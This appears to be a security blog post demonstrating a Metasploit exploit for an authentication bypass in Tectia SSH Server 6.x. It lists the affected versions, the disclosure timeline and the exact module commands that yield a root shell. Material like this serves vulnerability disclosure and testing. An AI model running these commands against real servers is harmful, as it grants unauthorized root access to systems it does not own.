aka wow on ZATAZ.com
Tectia SSH Server Authentication Bypass Metasploit Demo
Timeline :
Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope the 2012-12-01
Metasploit PoC the 2012-12-04
PoC provided by :
kingcope
bperry
sinn3r
Reference(s) :
Full Disclosure
Tectia Support
Affected version(s) :
SSH Tectia Server 6.0.4 to 6.0.20
SSH Tectia Server 6.1.0 to 6.1.12
SSH Tectia Server 6.2.0 to 6.2.5
SSH Tectia Server 6.3.0 to 6.3.2
Tested on Centos 5.8 x86 with :
SSH Tectia Server 6.3.2-33
Description :
This module exploits a vulnerability in Tectia SSH server for Unix-based platforms. The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request before password authentication, allowing any remote user to bypass the login routine, and then gain access as root.
Commands :
use exploit/unix/ssh/tectia_passwd_changereq set RHOST 192.168.178.34 set PAYLOAD cmd/unix/interact exploit id uname -a /sbin/ifconfig
I recommend you to read these related posts
- Tectia SSH Server Authentication Bypass Remote 0day Exploit Demo
- Metasploit SSH Auxiliary Modules
- CVE-2010-3867 : ProFTPD IAC Remote Root Exploit
- SUC015 : Potential SSH Scan
- CVE-2012-6066 Freesshd Authentication Bypass Metasploit Demo
- Rumeur de 0day SSH
- Increasing SSH Brute Force Attempts
- Increasing SSH Brute Force Attempts
- Scan SSH en augmentation
- Luxembourg Critical Remote Management Applications Attack Surface
Logging In...
Leave a Reply Cancel reply
Last reply was 5 months ago
great
oooooo, very nice bro , thanks
,, send meeeeeeee :X